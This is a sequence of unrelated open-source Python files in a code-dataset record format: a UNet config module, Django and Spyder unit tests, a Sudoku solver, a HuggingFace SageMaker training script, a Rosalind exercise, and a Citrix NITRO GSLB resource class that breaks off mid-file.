[],\n unetsl.DATA_SOURCES : []\n }\n default_heads = [\n (\"distance\", 1, 6, 2, \"relu\", 0, unetsl.data.LINEAR_LABELS, \"min pool\"),\n (\"membrane-scale\", 2, 2, 0, \"sigmoid\", 1, unetsl.data.MULTICLASS_LABELS, \"max pool\"),\n (\"membrane-crop\", 2, 2, 0, \"sigmoid\", 0, unetsl.data.MULTICLASS_LABELS, \"crop\") \n ]\n \n for nm, n_labels, bits, offset, activation, depth, labeller_name, resampler in default_heads:\n hd = getDefaultHeadConfig()\n hd[HeadConstants.name] = nm\n hd[HeadConstants.n_labels] = n_labels\n hd[HeadConstants.bits] = bits\n hd[HeadConstants.offset] = offset\n hd[HeadConstants.activation] = activation\n hd[HeadConstants.depth] = depth\n hd[unetsl.data.LABELLER] = labeller_name\n hd[HeadConstants.resampler] = resampler\n dflt[\"heads\"].append(hd)\n return dflt\n\ndef getDefaultCerberusPredictionConfig():\n return {\n }\n\ndef saveConfig(cfg, pth):\n with open(pth, 'w', encoding=\"utf8\") as f:\n json.dump(cfg, f, indent=\" \")\n \n\ndef guessDefaultLossFunction(name):\n \"\"\"\n For setting up a default model that \"works\" without changing any parameters \n during create/attach/train.\n \n 'distance' is a head with a distance transform output, this presumes\n linear labels, and the logMse. This seems a bit more robust than the mse\n and it prevents the distance transform from dominating the loss optimization.\n \n 'membrane' or 'skeleton' would be a sparse labelling where the dice\n coefficient has shown to work well.\n \n \"\"\"\n if 'distance' in name:\n return \"unetsl.model.logMse\"\n elif 'membrane' in name or 'skeleton' in name:\n return \"unetsl.model.sorensenDiceCoefLoss\"\n \n return \"keras.losses.mean_squared_error\"\n\ndef getTrainingConfig(config):\n \"\"\"\n Checks the provided config for traning config, if it isn't present, \n a defulat version will be loaded.\n \n \"\"\"\n if config is None:\n config = getDefaultCerberusConfig()\n \n if \"training\" not in config:\n training_config = dict()\n training_config.update( unetsl.config.getDefaultTrainingConfig() )\n \n training_config[unetsl.LOSS_FUNCTION] = {}\n training_config[\"loss weights\"] = {}\n config[\"training\"] = training_config\n else:\n training_config = config[\"training\"]\n \n loss_fns = training_config[unetsl.LOSS_FUNCTION]\n loss_wts = training_config[\"loss weights\"]\n \n for head in config[\"heads\"]:\n if head[\"name\"] not in loss_fns:\n loss_fns[ head[\"name\"] ] = guessDefaultLossFunction(head[\"name\"])\n if head[\"name\"] not in loss_wts:\n loss_wts[ head[\"name\"] ] = 1\n \n return training_config\n\ndef getDefaultHeadConfig():\n cfg = {\n HeadConstants.name : None,\n HeadConstants.n_labels : -1,\n HeadConstants.bits : -1,\n HeadConstants.offset: -1,\n HeadConstants.activation : \"sigmoid\",\n HeadConstants.depth : 0, \n HeadConstants.resampler : \"max pool\"\n }\n return cfg\n\ndef loadConfig(config_path):\n pth = pathlib.Path(config_path)\n if pth.exists():\n cfg = json.load(open(pth, 'r'))\n else:\n cfg = getDefaultCerberusConfig()\n return cfg\n","repo_name":"FrancisCrickInstitute/ActiveUnetSegmentation","sub_path":"src/unetsl/cerberus/cerberus_config.py","file_name":"cerberus_config.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"8998219747","text":"import urllib\nfrom collections import namedtuple\nfrom django.test import TestCase\nfrom mock import Mock, patch\nfrom rufus.api import InternalAPI\nfrom rufus.commands import HelpCommand\n\nMockResponse = namedtuple('MockResponse', ['status_code', 'content'])\n\n\nclass HelpCommandTestCase(TestCase):\n\n def test_api_help(self):\n msg = Mock()\n\n def mocked_message_get(*args, **kwargs):\n if args[0] == 'From':\n return 'Somebody New '\n elif args[0] == 'Subject':\n return 'HELP'\n\n msg.get = Mock(side_effect=mocked_message_get)\n\n with patch('rufus.api.InternalAPI.send_help_notification') as mock_send_help_notification:\n command = HelpCommand(msg)\n command.execute()\n mock_send_help_notification.assert_called_once_with('nobody@gmail.com')\n\n def test_api_help_requests_post(self):\n msg = Mock()\n\n def mocked_message_get(*args, **kwargs):\n if args[0] == 'From':\n return 'Somebody New '\n elif args[0] == 'Subject':\n return 'Awesome title'\n\n msg.get = Mock(side_effect=mocked_message_get)\n\n with patch('rufus.api.requests.post', return_value=MockResponse(status_code=200, content=\"{}\")) as mock_post:\n command = HelpCommand(msg)\n command.execute()\n api = InternalAPI()\n mock_post.assert_called_once_with(api.API_SEND_HELP_NOTIFICATION % urllib.quote('nobody@gmail.com'),\n headers={'Content-type': 'application/json'},\n )","repo_name":"mei-chen/beagle","sub_path":"Dogbone/rufus/tests/test_help_command.py","file_name":"test_help_command.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"29665984878","text":"from utils import *\n\nrow_units = [cross(r, cols) for r in rows]\ncolumn_units = [cross(rows, c) for c in cols]\n\n# Backslash diagonal unit\nb_slash_diag = [[rows[c] + cols[c] for c in range(len(rows))]]\n# Forward slash diagonal unit\nf_slash_diag = [[rows[c] + cols[(len(cols) - 1) - c] for c in range(len(rows))]]\n\nsquare_units = [cross(rs, cs) for rs in ('ABC','DEF','GHI') for cs in ('123','456','789')]\nunitlist = row_units + column_units + square_units\n\n# add the new diagonal units\nunitlist = unitlist + b_slash_diag + f_slash_diag\n\nunits = dict((s, [u for u in unitlist if s in u]) for s in boxes)\npeers = dict((s, set(sum(units[s],[]))-set([s])) for s in boxes)\n\ndef naked_twins(values):\n \"\"\"Eliminate values using the naked twins strategy.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with the naked twins eliminated from peers\n \"\"\"\n\n # Find all twin boxes - boxes with len() of 2\n twin_boxes = [box for box in values.keys() if len(values[box]) == 2]\n \n for twin_box in twin_boxes:\n twin_box_matches = []\n # Find Box units for each twin box - row, col, 3x3\n twin_box_units = [p for p in units[twin_box]]\n \n for box_unit in twin_box_units:\n for box in box_unit:\n # If theres a match, then its a naked twin\n if values[twin_box] == values[box] and twin_box != box:\n # Since its a naked twin, append the current unit (row, col or 3x3)\n if box_unit not in twin_box_matches:\n twin_box_matches.append(box_unit)\n \n if len(twin_box_matches) > 0:\n # For every unit in twin_box_matches\n for box_max in twin_box_matches:\n for box in box_max:\n for c in values[twin_box]:\n # If letter match\n if c in values[box] and values[twin_box] != values[box] and len(values[box]) >= 2:\n values[box] = values[box].replace(c, '')\n\n return values\n\ndef eliminate(values):\n \"\"\"Apply the eliminate strategy to a Sudoku puzzle\n\n The eliminate strategy says that if a box has a value assigned, then none\n of the peers of that box can have the same value.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with the assigned values eliminated from peers\n \"\"\"\n solved_values = [box for box in values.keys() if len(values[box]) == 1]\n for box in solved_values:\n digit = values[box]\n for peer in peers[box]:\n values[peer] = values[peer].replace(digit,'')\n \n return values\n\ndef only_choice(values):\n \"\"\"Apply the only choice strategy to a Sudoku puzzle\n\n The only choice strategy says that if only one box in a unit allows a certain\n digit, then that box must be assigned that digit.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict\n The values dictionary with all single-valued boxes assigned\n \"\"\"\n for unit in unitlist:\n for digit in '123456789':\n dplaces = [box for box in unit if digit in values[box]]\n if len(dplaces) == 1:\n values[dplaces[0]] = digit\n \n return values\n\ndef reduce_puzzle(values):\n \"\"\"Reduce a Sudoku puzzle by repeatedly applying all constraint strategies\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict or False\n The values dictionary after continued application of the constraint strategies\n no longer produces any changes, or False if the puzzle is unsolvable \n \"\"\"\n stalled = False\n while not stalled:\n # Check how many boxes have a determined value\n solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])\n # Use the Eliminate Strategy\n values = eliminate(values)\n # Use the Only Choice Strategy\n values = only_choice(values)\n # Use the Naked Twins Strategy\n values = naked_twins(values)\n # Check how many boxes have a determined value, to compare\n solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])\n # If no new values were added, stop the loop.\n stalled = solved_values_before == solved_values_after\n # Sanity check, return False if there is a box with zero available values:\n if len([box for box in values.keys() if len(values[box]) == 0]):\n return False\n return values\n\ndef search(values):\n \"\"\"Apply depth first search to solve Sudoku puzzles in order to solve puzzles\n that cannot be solved by repeated reduction alone.\n\n Parameters\n ----------\n values(dict)\n a dictionary of the form {'box_name': '123456789', ...}\n\n Returns\n -------\n dict or False\n The values dictionary with all boxes assigned or False\n \"\"\"\n\n # \"Using depth-first search and propagation, try all possible values.\"\n # First, reduce the puzzle using the previous function\n values = reduce_puzzle(values)\n if values is False:\n return False # Failed earlier\n if all(len(values[s]) == 1 for s in boxes): \n return values # Solved!\n # Choose one of the unfilled squares with the fewest possibilities - i.e the shortest string\n n,s = min((len(values[s]), s) for s in boxes if len(values[s]) > 1)\n \n # Now use recurrence to solve each one of the resulting sudokus, and\n # For each item in the string is each box\n for value in values[s]:\n # Copy the sudoku board\n new_sudoku = values.copy()\n # Replace new sudoku board box at position s with value (brute force)\n new_sudoku[s] = value\n attempt = search(new_sudoku)\n if attempt:\n return attempt\n\ndef solve(grid):\n \"\"\"Find the solution to a Sudoku puzzle using search and constraint propagation\n\n Parameters\n ----------\n grid(string)\n a string representing a sudoku grid.\n \n Ex. '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n\n Returns\n -------\n dict or False\n The dictionary representation of the final sudoku grid or False if no solution exists.\n \"\"\"\n values = grid2values(grid)\n values = search(values)\n return values\n\n\nif __name__ == \"__main__\":\n diag_sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'\n display(grid2values(diag_sudoku_grid))\n result = solve(diag_sudoku_grid)\n display(result)\n\n try:\n import PySudoku\n PySudoku.play(grid2values(diag_sudoku_grid), result, history)\n\n except SystemExit:\n pass\n except:\n print('We could not visualize your board due to a pygame issue. Not a problem! It is not a requirement.')\n","repo_name":"brendanmcgivern/aind-sudoku","sub_path":"solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"18995564475","text":"import pytest\nfrom qtpy.QtWidgets import QWidget\n\n# Local imports\nfrom spyder_notebook.widgets.client import NotebookClient\n\n\nclass MockPlugin(QWidget):\n def get_plugin_actions(self):\n return []\n\n\n@pytest.fixture\ndef client(qtbot):\n \"\"\"Construct a NotebookClient for use in tests.\"\"\"\n plugin = MockPlugin()\n client = NotebookClient(plugin, '/path/notebooks/ham.ipynb')\n server_info = {'notebook_dir': '/path/notebooks',\n 'url': 'fake_url',\n 'token': 'fake_token'}\n client.register(server_info)\n return client\n\n\ndef test_notebookclient_get_kernel_id(client, mocker):\n \"\"\"Basic unit test for NotebookClient.get_kernel_id().\"\"\"\n response = mocker.Mock()\n content = b'[{\"kernel\": {\"id\": \"42\"}, \"notebook\": {\"path\": \"ham.ipynb\"}}]'\n response.content = content\n mocker.patch('requests.get', return_value=response)\n\n kernel_id = client.get_kernel_id()\n assert kernel_id == '42'\n\n\ndef test_notebookclient_get_kernel_id_with_fields_missing(client, mocker):\n \"\"\"Test NotebookClient.get_kernel_id() if response has fields missing.\"\"\"\n response = mocker.Mock()\n content = (b'[{\"kernel\": {\"id\": \"1\"}, \"notebook\": {\"spam\": \"eggs\"}},'\n b' {\"kernel\": {\"id\": \"2\"}},'\n b' {\"kernel\": {\"id\": \"3\"}, \"notebook\": {\"path\": \"ham.ipynb\"}}]')\n response.content = content\n mocker.patch('requests.get', return_value=response)\n\n kernel_id = client.get_kernel_id()\n assert kernel_id == '3'\n","repo_name":"abhinavvv03/Spyder-Notebook","sub_path":"spyder_notebook/widgets/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9945113278","text":"import argparse\r\nfrom cgi import test\r\nfrom email.policy import default\r\nfrom transformers import AdamW, AutoModelForSequenceClassification, get_scheduler, AutoTokenizer, DataCollatorWithPadding\r\nfrom torch.utils.data import DataLoader\r\nimport torch.utils.data.distributed as data_dist\r\nfrom datasets import load_from_disk\r\nimport evaluate\r\n#from datasets.filesystems import S3FileSystem\r\nimport torch as th\r\nfrom tqdm.auto import tqdm\r\nimport json\r\n\r\nimport logging\r\nimport sys\r\nimport os\r\n\r\n\r\n#from utils import set_global_logging_level\r\n\r\nlogger = logging.getLogger(__name__)\r\nlogging.basicConfig(\r\n level=logging.getLevelName(\"INFO\"),\r\n handlers=[logging.StreamHandler(sys.stdout)],\r\n format=\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\",\r\n)\r\n\r\n\r\ndef _get_train_dataloader(dataset_dir, train_batch_size, data_collator=None, is_distributed=False, **kwargs):\r\n logger.info(\"Getting train dataloader\")\r\n \r\n train_dataset = load_from_disk(dataset_dir)\r\n train_dataset = train_dataset.remove_columns(\"text\")\r\n train_sampler = (\r\n data_dist.DistributedSampler(train_dataset) if is_distributed else None\r\n )\r\n return DataLoader(\r\n train_dataset,\r\n batch_size=train_batch_size,\r\n shuffle=train_sampler is None,\r\n sampler=train_sampler,\r\n collate_fn=data_collator,\r\n **kwargs,\r\n )\r\n\r\ndef _get_test_dataloader(dataset_dir, test_batch_size, data_collator=None, **kwargs):\r\n logger.info(\"Getting test dataloader.\")\r\n \r\n test_dataset = load_from_disk(dataset_dir)\r\n return DataLoader(\r\n test_dataset,\r\n batch_size=test_batch_size,\r\n shuffle=True,\r\n collate_fn=data_collator,\r\n **kwargs,\r\n )\r\n\r\n\r\ndef train(args):\r\n \r\n device = th.device(\"cuda\" if th.cuda.is_available() else \"cpu\")\r\n \r\n tokenizer = AutoTokenizer.from_pretrained(args.model_name)\r\n data_collator = DataCollatorWithPadding(tokenizer=tokenizer, padding=True)\r\n \r\n train_dataloader = _get_train_dataloader(args.training_dir, args.train_batch_size, data_collator=data_collator)\r\n test_dataloader = _get_test_dataloader(args.testing_dir, args.test_batch_size, data_collator=data_collator)\r\n \r\n logger.debug(f\"Processes {len(train_dataloader.sampler)}/{len(train_dataloader.dataset)} ({100.0 * len(train_dataloader.sampler) / len(train_dataloader.dataset)}%) of train data\")\r\n logger.debug(f\"Processes {len(test_dataloader.sampler)}/{len(test_dataloader.dataset)} ({100.0 * len(test_dataloader.sampler) / len(test_dataloader.dataset)}%) of test data\")\r\n \r\n model = AutoModelForSequenceClassification.from_pretrained(args.model_name)\r\n \r\n model.to(device)\r\n \r\n optimizer = AdamW(model.parameters(), lr=float(args.learning_rate))\r\n \r\n num_training_steps = args.epochs * len(train_dataloader)\r\n lr_scheduler = get_scheduler(\r\n args.scheduler,\r\n optimizer=optimizer,\r\n num_warmup_steps=args.warmup_steps,\r\n num_training_steps=num_training_steps\r\n )\r\n\r\n #progress_bar = tqdm(range(num_training_steps))\r\n\r\n model.train()\r\n for _ in range(args.epochs):\r\n with tqdm(train_dataloader, unit=\"batch\") as training_epoch:\r\n for batch in training_epoch:\r\n \r\n batch = {k: v.to(device) for k, v in batch.items()}\r\n outputs = model(**batch)\r\n \r\n loss = outputs.loss\r\n loss.backward()\r\n\r\n optimizer.step()\r\n lr_scheduler.step()\r\n optimizer.zero_grad()\r\n\r\n correct = training_performance(outputs, batch)\r\n accuracy = correct / args.train_batch_size\r\n\r\n training_epoch.set_postfix(loss=loss.item(), accuracy=100. * accuracy)\r\n #progress_bar.update(1)\r\n \r\n evaluate_model(model, test_dataloader, device)\r\n\r\n save_model(model, tokenizer, args.model_dir)\r\n logger.info(f\"Made it this far\")\r\n\r\ndef training_performance(outputs, batch):\r\n \r\n correct = 0\r\n labels = batch.pop(\"labels\")\r\n logits = outputs.logits\r\n predictions = th.argmax(logits, dim=-1)\r\n correct += predictions.eq(labels.view_as(predictions)).sum().item()\r\n return correct\r\n\r\ndef evaluate_model(model, test_dataloader, device):\r\n logger.info(f\"Evaluating...\")\r\n\r\n metric = evaluate.load(\"glue\", \"mrpc\")\r\n model.eval()\r\n for batch in test_dataloader:\r\n batch = {k: v.to(device) for k, v in batch.items()}\r\n with th.no_grad():\r\n outputs = model(**batch)\r\n\r\n logits = outputs.logits\r\n predictions = th.argmax(logits, dim=-1)\r\n metric.add_batch(predictions=predictions, references=batch.pop(\"labels\"))\r\n test_loss = compute_loss(model, test_dataloader, device)\r\n logger.info(f\"{metric.compute()} - loss = {test_loss}\")\r\n\r\n\r\n# def compute_loss(model, inputs, test_dataloader):\r\n# model.eval()\r\n# test_loss = 0\r\n# loss_function = th.nn.NLLLoss()\r\n# with th.no_grad():\r\n# for batch in test_dataloader:\r\n# outputs = model(**batch)\r\n# logits = outputs.logits\r\n# predictions = th.argmax(logits, dim=-1)\r\n# test_loss += loss_function(predictions, batch.pop(\"labels\"), size_average=False).item()\r\n \r\n# test_loss /= len(test_dataloader.dataset)\r\n# return test_loss\r\n\r\ndef compute_loss(model, test_dataloader, device):\r\n model.eval()\r\n test_loss = 0\r\n with th.no_grad():\r\n for batch in test_dataloader:\r\n batch = {k: v.to(device) for k, v in batch.items()}\r\n outputs = model(**batch) \r\n test_loss += outputs.loss\r\n \r\n test_loss /= len(test_dataloader.dataset)\r\n return test_loss\r\n\r\n\r\n# def model_fn(model_dir):\r\n # device = th.device(\"cuda\" if th.cuda.is_available() else \"cpu\")\r\n # #model = th.nn.DataParallel(NeuralNet())\r\n # with open(os.path.join(model_dir, \"model.pth\"), \"rb\") as f:\r\n # model.load_state_dict(torch.load(f))\r\n # return model.to(device)\r\n\r\n\r\ndef save_model(model, tokenizer, model_dir):\r\n logger.info(\"Saving the model.\")\r\n\r\n model.save_pretrained(model_dir, state_dict=model.cpu().state_dict())\r\n tokenizer.save_pretrained(model_dir)\r\n\r\nif __name__ == '__main__':\r\n \r\n parser = argparse.ArgumentParser()\r\n \r\n parser.add_argument(\"--epochs\", type=int, default=1, help=\"Number of training epochs. Default=1\")\r\n parser.add_argument(\"--train_batch_size\", type=int, default=16, help=\"Batch size for training. Default=16\")\r\n parser.add_argument(\"--test_batch_size\", type=int, default=100, help=\"Batch size for testing. Default=100\")\r\n parser.add_argument(\"--warmup_steps\", type=int, default=500, help=\"Number of warmmup steps. Default=500\")\r\n parser.add_argument(\"--scheduler\", type=str, default=\"linear\", help=\"HuggingFace learning rate scheduler. Default='linear'\")\r\n parser.add_argument(\"--learning_rate\", type=str, default=\"5e-5\", help=\"Learning rate. Default=5e-5\")\r\n parser.add_argument(\"--model_name\", type=str, default=\"distilbert-base-uncased\", help=\"Pretrained Huggingface model. Default='distilbert-base-uncased'\")\r\n parser.add_argument(\"--tokenizer\", type=str, default=\"distilbert-base-uncased\", help=\"HuggingFace tokenizer. Default='distilbert-base-uncased'\")\r\n \r\n # Container environment\r\n parser.add_argument(\"--hosts\", type=list, default=json.loads(os.environ[\"SM_HOSTS\"]))\r\n parser.add_argument(\"--current-host\", type=str, default=os.environ[\"SM_CURRENT_HOST\"])\r\n\r\n parser.add_argument(\"--output_data_dir\", type=str, default=os.environ[\"SM_OUTPUT_DATA_DIR\"])\r\n parser.add_argument(\"--model_dir\", type=str, default=os.environ[\"SM_MODEL_DIR\"])\r\n parser.add_argument(\"--n_gpus\", type=str, default=os.environ[\"SM_NUM_GPUS\"])\r\n parser.add_argument(\"--training_dir\", type=str, default=os.environ[\"SM_CHANNEL_TRAIN\"])\r\n parser.add_argument(\"--testing_dir\", type=str, default=os.environ[\"SM_CHANNEL_TEST\"])\r\n \r\n args, _ = parser.parse_known_args()\r\n \r\n train(args)\r\n","repo_name":"cfcooney/sagemaker_sdk_examples","sub_path":"huggingface_estimator/scripts/bespoke_training.py","file_name":"bespoke_training.py","file_ext":"py","file_size_in_byte":8109,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"8482288511","text":"# Ordering Strings of Varying Length Lexicographically\n# rosalind.info/problems/lexv/\nimport sys\nfrom itertools import *\n\nclass lexv:\n def combine(self, symbols, n, vary='', result=[]):\n if n > 0:\n for sym in symbols:\n el = vary + sym\n result.append(el)\n self.combine(symbols, n - 1, el, result)\n\n return result\n\n def main(self, dna_file):\n symbols = dna_file.readline()\n symbols = list(symbols[:-1])\n symbols = filter(lambda x: str(x) != ' ' , symbols)\n n = int(dna_file.readline())\n\n return self.combine(symbols, n)\n\nif __name__ == '__main__':\n filename = sys.argv[1]\n if not filename:\n raise Exception('ERROR: File name should not be empty!')\n\n with open(filename, 'r') as seq_file:\n result = lexv().main(seq_file)\n print('\\n'.join(result))","repo_name":"yuriyshapovalov/Prototypes","sub_path":"Rosalind/lexv.py","file_name":"lexv.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2612103264","text":"from massrc.com.citrix.mas.nitro.resource.Base import *\nfrom massrc.com.citrix.mas.nitro.service.options import options\nfrom massrc.com.citrix.mas.nitro.exception.nitro_exception import nitro_exception\nfrom massrc.com.citrix.mas.nitro.util.filtervalue import filtervalue\nfrom massrc.com.citrix.mas.nitro.resource.Base.base_resource import base_resource\nfrom massrc.com.citrix.mas.nitro.resource.Base.base_response import base_response\n\n\n'''\nConfiguration for NetScaler GSLB Service resource\n'''\n\nclass ns_gslb_service(base_resource):\n\t_fqdn= \"\"\n\t_password= \"\"\n\t_sites= \"\"\n\t_tenant= \"\"\n\t_id= \"\"\n\t_siteList=[]\n\t__count=\"\"\n\t'''\n\tget the resource id\n\t'''\n\tdef get_resource_id(self) :\n\t\ttry:\n\t\t\tif hasattr(self, 'id'):\n\t\t\t\treturn self.id \n\t\t\telse:\n\t\t\t\treturn None \n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tget the resource type\n\t'''\n\tdef get_object_type(self) :\n\t\ttry:\n\t\t\treturn \"ns_gslb_service\"\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tReturns the value of object identifier argument.\n\t'''\n\tdef get_object_id(self) :\n\t\ttry:\n\t\t\treturn self._id\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tReturns the value of object file path argument.\n\t'''\n\t@property\n\tdef file_path_value(self) :\n\t\ttry:\n\t\t\treturn None\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tReturns the value of object file component name.\n\t'''\n\t@property\n\tdef file_component_value(self) :\n\t\ttry :\n\t\t\treturn \"ns_gslb_services\"\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\n\t'''\n\tget Domain Name\n\t'''\n\t@property\n\tdef fqdn(self) :\n\t\ttry:\n\t\t\treturn self._fqdn\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tset Domain Name\n\t'''\n\t@fqdn.setter\n\tdef fqdn(self,fqdn):\n\t\ttry :\n\t\t\tif not isinstance(fqdn,str):\n\t\t\t\traise TypeError(\"fqdn must be set to str value\")\n\t\t\tself._fqdn = fqdn\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget The pass-phrase that was used to encrypt the private-key.\n\t'''\n\t@property\n\tdef password(self) :\n\t\ttry:\n\t\t\treturn self._password\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tset The pass-phrase that was used to encrypt the private-key.\n\t'''\n\t@password.setter\n\tdef password(self,password):\n\t\ttry :\n\t\t\tif not isinstance(password,str):\n\t\t\t\traise TypeError(\"password must be set to str value\")\n\t\t\tself._password = password\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget List of sites\n\t'''\n\t@property\n\tdef sites(self) :\n\t\ttry:\n\t\t\treturn self._sites\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget Tenant Name\n\t'''\n\t@property\n\tdef tenant(self) :\n\t\ttry:\n\t\t\treturn self._tenant\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tget Id is system generated key for all the NetScaler GSLB Service\n\t'''\n\t@property\n\tdef id(self) :\n\t\ttry:\n\t\t\treturn self._id\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tset Id is system generated key for all the NetScaler GSLB Service\n\t'''\n\t@id.setter\n\tdef id(self,id):\n\t\ttry :\n\t\t\tif not isinstance(id,str):\n\t\t\t\traise TypeError(\"id must be set to str value\")\n\t\t\tself._id = id\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tList of sites\n\t'''\n\t@property\n\tdef siteList(self) :\n\t\ttry:\n\t\t\treturn self._siteList\n\t\texcept Exception as e :\n\t\t\traise e\n\t'''\n\tList of sites\n\t'''\n\t@siteList.setter\n\tdef siteList(self,siteList) :\n\t\ttry :\n\t\t\tif not isinstance(siteList,list):\n\t\t\t\traise TypeError(\"siteList must be set to array of str value\")\n\t\t\tfor item in siteList :\n\t\t\t\tif not isinstance(item,str):\n\t\t\t\t\traise TypeError(\"item must be set to str value\")\n\t\t\tself._siteList = siteList\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to add NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef add(cls,service=None,resource=None):\n\t\ttry:\n\t\t\tif resource is None :\n\t\t\t\traise Exception(\"Resource Object Not Found\")\n\t\t\tif type(resource) is not list :\n\t\t\t\treturn resource.perform_operation(service,\"add\")\n\t\t\telse : \n\t\t\t\tns_gslb_service_obj= ns_gslb_service()\n\t\t\t\treturn cls.perform_operation_bulk_request(service,\"add\", resource,ns_gslb_service_obj)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to delete NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef delete(cls,client=None,resource=None): \n\t\ttry :\n\t\t\tif resource is None :\n\t\t\t\traise Exception(\"Resource Object Not Found\")\n\t\t\tif type(resource) is not list :\n\t\t\t\treturn resource.delete_resource(client)\n\t\t\telse :\n\t\t\t\t\tns_gslb_service_obj=ns_gslb_service()\n\t\t\t\t\treturn cls.delete_bulk_request(client,resource,ns_gslb_service_obj)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to get NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef get(cls,client = None,resource=\"\",option_=\"\"): \n\t\ttry:\n\t\t\tresponse=\"\"\n\t\t\tif not resource :\n\t\t\t\tns_gslb_service_obj=ns_gslb_service()\n\t\t\t\tresponse = ns_gslb_service_obj.get_resources(client,option_)\n\t\t\telse:\n\t\t\t\tresponse = resource.get_resource(client, option_)\n\t\t\treturn response\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this operation to modify NetScaler GSLB Service.\n\t'''\n\t@classmethod\n\tdef update(cls,client=None,resource=None):\n\t\ttry:\n\t\t\tif resource is None :\n\t\t\t\traise Exception(\"Resource Object Not Found\")\n\t\t\tif type(resource) is not list :\n\t\t\t\treturn resource.update_resource(client)\n\t\t\telse :\n\t\t\t\tns_gslb_service_obj=ns_gslb_service()\n\t\t\t\treturn cls.update_bulk_request(client,resource,ns_gslb_service_obj)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this API to fetch filtered set of ns_gslb_service resources.\n\tfilter string should be in JSON format.eg: \"vm_state:DOWN,name:[a-z]+\"\n\t'''\n\t@classmethod\n\tdef get_filtered(cls,service,filter_) :\n\t\ttry:\n\t\t\tns_gslb_service_obj = ns_gslb_service()\n\t\t\toption_ = options()\n\t\t\toption_._filter=filter_\n\t\t\treturn ns_gslb_service_obj.getfiltered(service, option_)\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\t* Use this API to count the ns_gslb_service resources.\n\t'''\n\t@classmethod\n\tdef count(cls,service) :\n\t\ttry:\n\t\t\tns_gslb_service_obj = ns_gslb_service()\n\t\t\toption_ = options()\n\t\t\toption_._count=True\n\t\t\tresponse = ns_gslb_service_obj.get_resources(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['___count']\n\t\t\treturn 0\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tUse this API to count the filtered set of ns_gslb_service resources.\n\tfilter string should be in JSON format.eg: \"vm_state:DOWN,name:[a-z]+\"\n\t'''\n\t@classmethod\n\tdef count_filtered(cls,service,filter_):\n\t\ttry:\n\t\t\tns_gslb_service_obj = ns_gslb_service()\n\t\t\toption_ = options()\n\t\t\toption_._count=True\n\t\t\toption_._filter=filter_\n\t\t\tresponse = ns_gslb_service_obj.getfiltered(service, option_)\n\t\t\tif response :\n\t\t\t\treturn response[0].__dict__['_count']\n\t\t\treturn 0;\n\t\texcept Exception as e :\n\t\t\traise e\n\n\t'''\n\tConverts API response into object and returns the object array in case of get request.\n\t'''\n\tdef get_nitro_response(self,service ,response):\n\t\ttry :\n\t\t\tresult=service.payload_formatter.string_to_resource(ns_gslb_service_response, response, self.__class__.__name__)\n\t\t\tif(result.errorcode != 0) :\n\t\t\t\tif (result.errorcode == 444) :\n\t\t\t\t\tservice.clear_session(self)\n\t\t\t\tif result.severity :\n\t\t\t\t\tif (result.severity == \"ERROR\") :\n\t\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\t\telse :\n\t\t\t\t\traise nitro_exception(result.errorcode, str(result.message), str(result.severity))\n\t\t\treturn result.ns_gslb_service\n\t\texcept Exception as e :\n\t\t\traise e\n\n\n\t'''\n\tConverts API response into object and returns the object array .\n\t'''\n\tdef get_nitro_bulk_response(self,service ,response):\n\t\ttry :\n\t\t\tresult=service.payload_formatter.string_to_resource(ns_gslb_service_responses, 